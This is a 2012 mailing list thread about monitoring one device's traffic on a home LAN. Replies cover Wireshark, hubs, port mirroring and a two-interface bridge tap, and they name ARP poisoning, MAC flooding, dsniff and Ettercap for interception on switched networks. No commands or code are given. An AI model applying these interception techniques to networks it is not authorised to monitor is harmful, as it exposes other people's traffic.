I want somehow (if it's possible) to monitor the packets going into and out of one ethernet address/MAC address on my LAN. I think it's currently plugged into a port on my 8-port Gigabit switch but I'm not absolutely sure of that.
The LAN comprises a Draytek Vigor ADSL router talking to the outside world and a Linksys 8-port Gigabit router with most of my LAN systems plugged into that. I think a couple of the four ports on the ADSL router may be in use in addition to the one that connects to the 8-Port Gigabit switch.
Is there any 'easy' way to monitor all traffic to/from one specific IP address on the LAN from my desktop computer or will the switches on the LAN prevent it seeing most of the traffic?
Actually even being able to see all traffic between my desktop and the device I'm interested in would probably be sufficient as 'lack of traffic' might well be enough to tell me what I want to know. So what are the best/easiest packet sniffers to run on a desktop machine that would allow me to 'see' all traffic to/from a specific IP address?
Unfortunately on a "dumb" switch (as opposed to a managed switch) it isn't that simple to see all traffic or traffic to/from a specific port other than the one your sniffer is plugged into.
On a managed switch you put the port your sniffer is plugged into into monitor mode (or span mode in Cisco money) which makes that port promiscuous, then you can see *all traffic.
As it is with a dumb switch, if you run wireshark on your desktop you will only see traffic to and from that machine + any broadcast packets.
If you have a machine with 2 ethernet interfaces you can build an ethernet tap either by making it a bridge and sticking it between whatever is in port 8 and the port itself or by doing another trick with some spare rj45 modules see
http://www.enigmacurry.com/category/diy/ for a reasonable guide on how to do this.
Finally you can use tricks such as ARP poisoning or MAC flooding but both of these are really only suitable for espionage rather than diagnostics as you change the behaviour of the network by utilising them.
* Well not quite all traffic
On Tue, Jul 31, 2012 at 08:05:41AM +0100, Wayne Stallwood wrote:
Unfortunately on a "dumb" switch (as opposed to a managed switch) it isn't that simple to see all traffic or traffic to/from a specific port other than the one your sniffer is plugged into.
Yes, I suppose I could dig out a *really dumb* hub as opposed to a switch and plug the relevant boxes into that - see below though.
On a managed switch you put the port your sniffer is plugged into into monitor mode (or span mode in Cisco money) which makes that port promiscuous, then you can see *all traffic.
As it is with a dumb switch, if you run wireshark on your desktop you will only see traffic to and from that machine + any broadcast packets.
Fortunately running wireshark on my desktop machine showed me what the problem was, the packets I was looking for were (supposed to be) broadcast packets but the destination address was getting set to pretty much random numbers rather than the correct 255.255.255.255. Since the switch didn't know where to send the packets with random looking addresses they arrived at my desktop machine (as well as everywhere else presumably) and I could see them.
It was an uninitialised variable in a loop causing the problem.
If you have a machine with 2 ethernet interfaces you can build an ethernet tap either by making it a bridge and sticking it between whatever is in port 8 and the port itself or by doing another trick with some spare rj45 modules see
http://www.enigmacurry.com/category/diy/ for a reasonable guide on how to do this.
That could be very useful, I have a 'spare' machine which has two ethernet interfaces so could set it up as a tap quite easily.
Finally you can use tricks such as ARP poisoning or MAC flooding but both of these are really only suitable for espionage rather than diagnostics as you change the behaviour of the network by utilising them.
- Well not quite all traffic
Thanks for all the ideas.
On Tue, 31 Jul 2012 08:05:41 +0100 Wayne Stallwood ALUGlist@digimatic.co.uk allegedly wrote:
Finally you can use tricks such as ARP poisoning or MAC flooding but both of these are really only suitable for espionage rather than diagnostics as you change the behaviour of the network by utilising them.
Try dugsong's tools (dsniff et al) at http://www.monkey.org/~dugsong/dsniff/ or probably available in your distro repository.
Mick
--------------------------------------------------------------------- blog: baldric.net fingerprint: FC23 3338 F664 5E66 876B 72C0 0A1F E60B 5BAD D312
Note that I have recently upgraded my GPG key see: http://baldric.net/2012/07/20/gpg-key-upgrade/ ---------------------------------------------------------------------
Hi Chris,
The simplest way to do this is to connect your PC and the other LAN device into a hub. Then you can use a program like wireshark or tcpdump to view all the traffic from the other LAN device. Another option is to use ARP poisoning, this would at least cause you to see traffic from other devices trying to leave the local subnet (by posing as your router).
If you have a managed switch that supports more advanced features you can use something like SPAN or port mirroring to get a copy of all traffic coming into one port, sent out another.
Cheers, James.
Ettercap is something to look at for use in a switched lan, I've not had cause to use it outside of testing yet.
Adam
-
Adam Bower -
Chris Green -
James Bensley -
mick -
Wayne Stallwood